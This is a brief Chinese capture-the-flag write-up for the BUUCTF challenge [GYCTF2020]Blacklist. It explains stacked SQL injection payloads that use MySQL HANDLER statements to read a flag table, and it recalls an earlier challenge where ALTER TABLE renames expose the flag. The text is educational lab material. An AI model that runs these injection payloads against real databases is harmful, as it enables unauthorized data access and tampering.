buuctf [GYCTF2020]Blacklist"/>
buuctf [GYCTF2020]Blacklist
HANDLER ... OPEN语句打开一个表,使其可以使用后续HANDLER ... READ语句访问,该表对象未被其他会话共享,并且在会话调用HANDLER ... CLOSE或会话终止之前不会关闭
1';HANDLER FlagHere OPEN;
HANDLER FlagHere READ FIRST;
HANDLER FlagHere CLOSE;#
来自 <[GYCTF2020]Blacklist - 高诺琪 - 博客园>
{直接在输入框内输入就好了},后面接着讲一些有关的内容
下面以“[强网杯 2019]随便注” 为例,
这里有两个表,一个是 ’ 1919810931114514 ‘ ,还有一个是’words‘ , words表中有id和data两个字段,1919810931114514表中有flag的字段
因为可以看到回显是两个数据,猜测应该是words表
那么骚操作开始了,有点像偷天换日的意思
1、将words表名替换成其他的
2、然后将 `1919810931114514` 这个表名称替换成words
3、在把flag这个字段替换成data
4、最后再插入一个id字段
最终的查询结果就可以输出我们构造的新的words了
payload 如下
1';alter table words rename to words1;
alter table `1919810931114514` rename to words;
alter table words change flag id varchar(50);#
最后用 1' or 1=1# 把flag打印出来
但是上面这个方法对“Blacklist”这个题失效了,应该是被过滤掉了,所以最后只能用最上面的方法了!
更多推荐
buuctf [GYCTF2020]Blacklist
发布评论